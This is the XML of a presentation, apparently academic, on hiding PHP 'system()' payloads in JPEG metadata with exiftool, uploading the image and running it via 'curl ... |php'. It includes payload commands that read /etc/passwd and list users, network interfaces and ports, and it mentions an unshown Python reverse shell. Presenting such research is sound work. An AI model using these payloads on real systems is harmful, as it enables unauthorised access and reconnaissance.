        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5982162" y="-24551"/>
            <a:ext cx="1062315" cy="8321288"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6536013" y="4185960"/>
            <a:ext cx="3909350" cy="4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62200" y="3793541"/>
            <a:ext cx="2285434" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. Create and upload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       malicious file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6682907" y="3816628"/>
            <a:ext cx="2837700" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.  Execute curl() command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351033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Steps for executing the attack	</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an image to upload to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using exiftool embed php code into the image metadata. The “Comment” section of the metadata is used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not change the file extension.  Leave it as is and upload the image file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the file has been successfully uploaded to the server, retrieve the file through the command line on the attacker machine using curl() to execute the php code in the image</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44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415607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Example</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Image file on local machine that will be used for the attack = CCIS-6.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the command prompt in Windows or Terminal in Mac and navigate to the location of the exiftool executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embed code into “Comment” metadata for the file CCIS-6.jpg with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload the image file with the embedded php code to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log into the attacker virtual Linux machine (192.168.1.205) from Windows using putty or ssh if using a Mac or Linux machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type the following curl() command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809749" y="4001294"/>
            <a:ext cx="9601199" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exiftool -Comment="&lt;?php system(‘cat / /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd'); __halt_compiler(); ?&gt;" ./Demo/CCIS-6.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545227" y="6176963"/>
            <a:ext cx="5010731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl http://192.168.1.206/uploads/CCIS-6.jpg |php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295347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5784"/>
            <a:ext cx="9601200" cy="1485900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Remote server configuration for future exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="2148271"/>
            <a:ext cx="11372850" cy="4595425"/>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Logged in users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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system(w); __halt_compiler(); ?&gt;" ./Demo/CCIS-1.jpg</a:t>
            </a:r>
          </a:p>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IP addresses for other interfaces</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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>); __halt_compiler(); ?&gt;" ./Demo/CCIS-2.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>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Commands with arguments</a:t>
            </a:r>
          </a:p>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Network routes</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netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> /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nr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'); __halt_compiler(); ?&gt;" ./Demo/CCIS-3.jpg</a:t>
            </a:r>
          </a:p>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Listening network ports</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netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> /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plnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>); __halt_compiler(); ?&gt;" ./Demo/CCIS-4.jpg</a:t>
            </a:r>
          </a:p>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Directory contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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system('ls / -ltr'); __halt_compiler(); ?&gt;" ./Demo/CCIS-5.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19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Password file...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>not actual passwords…but useful info about active user accounts</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exiftool -Comment="&lt;?php system('cat /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900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'); __halt_compiler(); ?&gt;" ./Demo/CCIS-6.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="995362" y="1719846"/>
            <a:ext cx="10201275" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The following commands executed successfully on the server using this attack </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89930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On the attack machine (192.168.1.205) type:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl http://192.168.1.206/uploads/CCIS-1.jpg |php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl http://192.168.1.206/uploads/CCIS-2.jpg |php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl http://192.168.1.206/uploads/CCIS-3.jpg |php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl http://192.168.1.206/uploads/CCIS-4.jpg |php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl http://192.168.1.206/uploads/CCIS-5.jpg |php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310155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Limitations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At this time, it was not possible to implement a reverse shell attack with this method.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, it is possible to upload multiple image files to accomplish the task of running multiple commands on the server to simulate a reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition, a reverse shell has been implemented in python.  The challenge is to circumvent file upload restrictions relating to python scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2076920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Future Work </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack is implemented with the www-data user which have extremely limited permissions.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Future work will investigate vulnerabilities with other user accounts and with file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>upIoads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> containing python code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To this extent we have:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>developed a reverse shell in python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implemented a small social media network using Django.  The social media app has features similar to Twitter and will help to identify vulnerabilities with the Django framework and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85435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CE0148-9DBE-3445-860E-D87F1DE30742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3FB9B61-2F04-3047-8365-78DB40E7E154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383656" y="1686464"/>
            <a:ext cx="3424687"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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7879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044113" cy="1485900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Requirements for this attack to work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux and the Apache web server with php installed.  Linux and Apache are very popular platforms for running websites and applications.  Php is a very popular scripting language for website development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux machine and exiftool to access image metadata.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exiftool is freeware that can be downloaded from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://exiftool.org/install.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11819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Image File Upload Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>File extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developers may blacklist specific file extensions and prevent users from uploading files with extensions that are considered dangerous. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>MIME type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
